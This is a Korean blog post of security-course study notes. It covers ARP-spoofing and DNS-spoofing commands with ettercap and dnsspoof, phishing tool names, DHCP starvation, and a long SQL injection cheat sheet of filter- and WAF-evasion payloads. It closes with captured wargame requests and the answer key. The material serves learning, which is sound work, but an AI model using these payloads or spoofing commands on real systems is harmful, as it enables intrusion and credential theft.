Notice
Recent Posts
Recent Comments
Link
«   2025/07   »
1 2 3 4 5
6 7 8 9 10 11 12
13 14 15 16 17 18 19
20 21 22 23 24 25 26
27 28 29 30 31
Archives
Today
Total
관리 메뉴

11.23 본문

Study/KITRI

11.23

awakerrday 2017. 6. 11. 19:15

HTTP 데이터 전송 메소드

GET: 입력했던 모든 내용이 URL 결과로 나타나남

POST: HTTP 메시지 안에 정보

 

 


 

 

 

DNS spoofing

dns.host 파일 생성 ([server ip]    [domain name])

ettercap -T -M arp:remote //target ip/ //target gateway ip/

dnsspoof -i eth0 -f dns.host

 

service --status-all 실행 중인 모든 데몬 확인

service apache2 start 아파치 실행

httrack

 

setoolkit

/var/www/html 아파치 페이지 저장 경로

 

 

 

s372n28yF4

 

출처: <http://iplogger.org/statistics/id=s372n28yF4/new=1/>

 

Wireshark tip

패킷 우클릭 - follow - stream 선택으로 패킷을 스트림형태로 보여줌

File - Export Objects 패킷으로 받은 파일을 추출가능

 

 

SQL injection 싱글쿼트(') 트릭

' or 1=1--

" or 1=1--

or 1=1--

' or 'a'='a

" or "a"="a

') or ('a'='a

 

 

Dhcpstarv -i eth0

Dhclient

 

 

 

1) 대소문자 변형

union select password from member where id='ireoa'--

UnION seLEct password ForM member WhErE id='ireoa'--

2) 공백 우회

/**/   %0a  %09  ()

3)  = 우회

union select password from member where username = 'ireoa'--

union select password from member where username like 'ireoa'--

4)URL Encoding

'%2f%2a*/union%2f%2a*/select%2f%2a*/password%2f%2a*/form%2f%2a*/member%2f%2a*/where%2f%2a*/username%2f%2a*/lie%2f%2a*/

'ireoa'--

가끔 실패 할수도있음 2중으로 한다

'252f%2f2a*/union252f%2f2a*/select252f%2f2a*/password252f%2f2a*/from252f%2f2a*/member252f%2f2a*/where252f%2f2a*/username252f%2f2a*/

like252f%2f2a*/'ireoa'--

5)유니코드 인코딩

1) '

%u0027

%u02b9

%u02bc

%u02c8

%u2032

%uff07

%c0%27

%c0%a7

%c0%80%a7

2)-

%u005f

%uff3f

%c0%2d

%c0%ad

%e0%80%ad

3)/

%u2215

%u2044

%uff0f

%c0%2f

%c0%af

%e0%80%af

4)(

%u0028

%uff08

%c0%28

%c0%a8

%e0%80%a8

5))

%u0029

%uff09

%c0%29

%c0%a9

%e0%80%a9

6)*

%u002a

%uff0a

%c0%2a

%c0%aa

%e0%80%aa

7) space

%u0020

%uff00

%c0%20

%c0%a0

%e0%80%a0

6)동적쿼리실행사용

MS-SQL : EXEC('SELECT password FROM member')

Oracle :

DECLEAR pw VARCHAR2(1000);

BEGIN

EXECUTE IMMEDIATE 'SELECT password FROM member' INTO pw;

DBMS_OUTPUT.PUT_LINE(pw); 

END;

 

7)SELECT

 

Oracle : 'SEL'||'ECT'

MS-SQL : 'SEL'+'ECT'     CHAR(93)+CHAR(69)+CHAR(76)+CHAR(69)+CHAR(67)+CHAR(84)

MySQL : 'SEL''ECT' 

 

MS-SQL에서  + %2b MySQL에서 빈공간을 %20으로 인코딩 해야함

Oracle에서는 가능함 REVERSE, TRANSLATE, REPLACE, SUBSTR 

 

8)NULL BYTE 우회 

IPS IDS 우회하기 위해서 사용 웹방화벽 IDS/IPS 주로 네이티브 코드로 작성되어있음 그래서 널바이트까지만 보므로 우회가 가능

 

%00' UNION SELECT password FROM member WHERE username='ireoa'--

 

9)연속구문우회

 

SELSELECTECT   빨간색이 사라지면서 파랑색의 SELECT 사용 가능

 

10)축소공격

 

다음 두가지 경우를 가정하자 

1)싱글쿼터(')를 ('')로 대체

2) 10개의 문자만 받는다  

 

그렇다면 만약 내가 aaaaaaaaa' 으로 공격을 시도한다면

첫번째 조건떄문에 aaaaaaaaa''으로 바뀌지만 10개의 문자만 전달하므로

내가원하는 aaaaaaaaa'이 들어가게 된다.

 

select * from member where username='aaaaaaaaa'' AND password = ''

만약 password에 or 1=1--을 넣어준다면

select * from member where username='aaaaaaaaa'' AND password = 'or 1=1--'

되므로 우회가 가능하다

 

출처: <http://lanian.tistory.com/entry/SQL-%EC%9D%B8%EC%A0%9D%EC%85%98-%EC%9A%B0%ED%9A%8C-%ED%8C%A8%ED%84%B4>

 

 

' or 1 like 1--

 

auth_key is suninatastopofworld!

 

GET /Part_one/web06/view.asp?idx=3&num=3&passcode=wkdrnlwnd HTTP/1.1

Host: suninatas.com

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Referer: http://suninatas.com/Part_one/web06/Serect.asp

Accept-Encoding: gzip, deflate, sdch

Accept-Language: ko,en-US;q=0.8,en;q=0.6,zh;q=0.4

Cookie: ASPSESSIONIDQCSSACCS=COLCOECAFICBMCGEBCEFNBOH; auth%5Fkey=%3F%3F%3F%3F%3F

Connection: close

 

65038b0559e459420aa2d23093d01e4a

 

POST /texttools/md5/?ajax=1 HTTP/1.1

Host: www.unit-conversion.info

Content-Length: 72

Accept: */*

Origin: http://www.unit-conversion.info

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Referer: http://www.unit-conversion.info/texttools/md5/

Accept-Encoding: gzip, deflate

Accept-Language: ko,en-US;q=0.8,en;q=0.6,zh;q=0.4

Cookie: PHPSESSID=bflmhqfj1v6ukoa6vp5qk79n56; sha-create-hash-online_algorithm=1; crc-create-hash-online_algorithm=1; base64_convert=1; _ga=GA1.2.1462779468.1482262751; _gat=1

Connection: close

 

form%5Btext%5D=suninatastopofworld!&out=65038b0559e459420aa2d23093d01e4a

 

 

 

 

 

 


'Study > KITRI' 카테고리의 다른 글

칼리 한글세팅  (0) 2017.06.11
11.24-25  (0) 2017.06.11
네트워크 기초3  (0) 2017.06.11
네트워크 기초2  (0) 2017.06.11
네트워크 기초  (0) 2017.06.11
Comments